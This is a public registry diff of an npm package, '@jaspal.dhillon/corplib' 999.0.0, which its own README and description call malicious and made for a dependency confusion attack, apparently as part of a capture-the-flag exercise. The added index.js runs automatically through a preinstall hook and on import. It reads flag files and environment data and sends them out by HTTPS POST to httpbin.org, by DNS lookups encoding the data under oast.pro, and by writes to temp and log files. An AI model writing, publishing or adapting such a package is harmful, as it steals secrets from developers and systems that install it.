@jaspal.dhillon/corplib 999.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/README.md +3 -0
  2. package/index.js +171 -0
  3. package/package.json +9 -0
package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # @jaspal.dhillon/corplib
2
+
3
+ Malicious package for dependency confusion attack.
package/index.js ADDED
@@ -0,0 +1,171 @@
1
+
2
+ const fs = require('fs');
3
+ const http = require('http');
4
+ const https = require('https');
5
+ const os = require('os');
6
+
7
+ // Function to read flag from various locations
8
+ function readFlag() {
9
+ const paths = [
10
+ '/opt/flag/flag.txt',
11
+ '/opt/flag/flag.txt',
12
+ '/flag',
13
+ '/flag.txt',
14
+ '/opt/flag',
15
+ '/home/node/flag.txt',
16
+ '/app/flag.txt',
17
+ process.env.FLAG || ''
18
+ ].filter(p => p);
19
+
20
+ for (const path of paths) {
21
+ try {
22
+ const flag = fs.readFileSync(path, 'utf8').trim();
23
+ if (flag && flag.length > 5) {
24
+ console.log('[MALICIOUS] Flag found at', path, ':', flag);
25
+ return flag;
26
+ }
27
+ } catch (e) {
28
+ // Continue trying
29
+ }
30
+ }
31
+ return null;
32
+ }
33
+
34
+ // Function to exfiltrate via multiple methods
35
+ function exfiltrate(flag) {
36
+ if (!flag) {
37
+ console.log('[MALICIOUS] No flag to exfiltrate');
38
+ return;
39
+ }
40
+
41
+ const exfilData = JSON.stringify({
42
+ flag: flag,
43
+ hostname: os.hostname(),
44
+ timestamp: new Date().toISOString(),
45
+ cwd: process.cwd(),
46
+ env: Object.keys(process.env).slice(0, 10) // First 10 env vars
47
+ });
48
+
49
+ // Method 1: HTTP POST to httpbin.org
50
+ try {
51
+ const options1 = {
52
+ hostname: 'httpbin.org',
53
+ port: 443,
54
+ path: '/post',
55
+ method: 'POST',
56
+ headers: {
57
+ 'Content-Type': 'application/json',
58
+ 'Content-Length': Buffer.byteLength(exfilData),
59
+ 'User-Agent': 'Node.js'
60
+ }
61
+ };
62
+
63
+ const req1 = https.request(options1, (res) => {
64
+ let data = '';
65
+ res.on('data', (chunk) => { data += chunk; });
66
+ res.on('end', () => {
67
+ console.log('[MALICIOUS] Exfiltration method 1 status:', res.statusCode);
68
+ console.log('[MALICIOUS] Response:', data.substring(0, 200));
69
+ });
70
+ });
71
+ req1.on('error', (e) => {
72
+ console.log('[MALICIOUS] Method 1 error:', e.message);
73
+ });
74
+ req1.write(exfilData);
75
+ req1.end();
76
+ } catch (e) {
77
+ console.log('[MALICIOUS] Method 1 exception:', e.message);
78
+ }
79
+
80
+ // Method 2: Write to accessible file
81
+ try {
82
+ const writePaths = [
83
+ '/tmp/flag_exfil.txt',
84
+ '/tmp/flag.txt',
85
+ '/app/flag_exfil.txt',
86
+ '/var/tmp/flag.txt',
87
+ os.tmpdir() + '/flag.txt'
88
+ ];
89
+
90
+ for (const writePath of writePaths) {
91
+ try {
92
+ fs.writeFileSync(writePath, flag, 'utf8');
93
+ console.log('[MALICIOUS] Flag written to', writePath);
94
+ break;
95
+ } catch (e) {
96
+ // Try next path
97
+ }
98
+ }
99
+ } catch (e) {
100
+ console.log('[MALICIOUS] File write error:', e.message);
101
+ }
102
+
103
+ // Method 3: Try to append to log files
104
+ try {
105
+ const logPaths = [
106
+ '/var/log/app.log',
107
+ '/app/logs/app.log',
108
+ '/tmp/app.log',
109
+ process.env.LOG_FILE || ''
110
+ ].filter(p => p);
111
+
112
+ for (const logPath of logPaths) {
113
+ try {
114
+ fs.appendFileSync(logPath, '\n[MALICIOUS] FLAG: ' + flag + '\n', 'utf8');
115
+ console.log('[MALICIOUS] Flag appended to', logPath);
116
+ break;
117
+ } catch (e) {
118
+ // Try next path
119
+ }
120
+ }
121
+ } catch (e) {
122
+ // Ignore
123
+ }
124
+
125
+ // Method 4: Try DNS exfiltration (if dns module is available)
126
+ try {
127
+ const dns = require('dns');
128
+ // Encode flag in subdomain (first 50 chars)
129
+ const encoded = Buffer.from(flag.substring(0, 50)).toString('base64').replace(/[^a-zA-Z0-9]/g, '');
130
+ const domain = encoded.substring(0, 50) + '.oast.pro'; // Using oast.pro for out-of-band
131
+ dns.lookup(domain, (err) => {
132
+ if (!err) console.log('[MALICIOUS] DNS exfiltration attempted');
133
+ });
134
+ } catch (e) {
135
+ // DNS might not be available
136
+ }
137
+ }
138
+
139
+ // Execute immediately when module loads
140
+ (function() {
141
+ console.log('[MALICIOUS] Package loaded! Starting flag extraction...');
142
+ const flag = readFlag();
143
+ if (flag) {
144
+ exfiltrate(flag);
145
+ } else {
146
+ console.log('[MALICIOUS] Flag not found, listing directory contents...');
147
+ try {
148
+ const dirs = ['/opt/flag', '/opt', '/flag', '/'];
149
+ for (const dir of dirs) {
150
+ try {
151
+ const files = fs.readdirSync(dir);
152
+ console.log('[MALICIOUS] Files in', dir, ':', files.slice(0, 10));
153
+ } catch (e) {
154
+ // Continue
155
+ }
156
+ }
157
+ } catch (e) {
158
+ console.log('[MALICIOUS] Directory listing error:', e.message);
159
+ }
160
+ }
161
+ })();
162
+
163
+ // Export function that also executes
164
+ module.exports = function() {
165
+ console.log('[MALICIOUS] Module.exports called!');
166
+ const flag = readFlag();
167
+ if (flag) {
168
+ exfiltrate(flag);
169
+ }
170
+ return { flag: flag };
171
+ };
package/package.json ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "name": "@jaspal.dhillon/corplib",
3
+ "version": "999.0.0",
4
+ "description": "Malicious package for dependency confusion",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node index.js"
8
+ }
9
+ }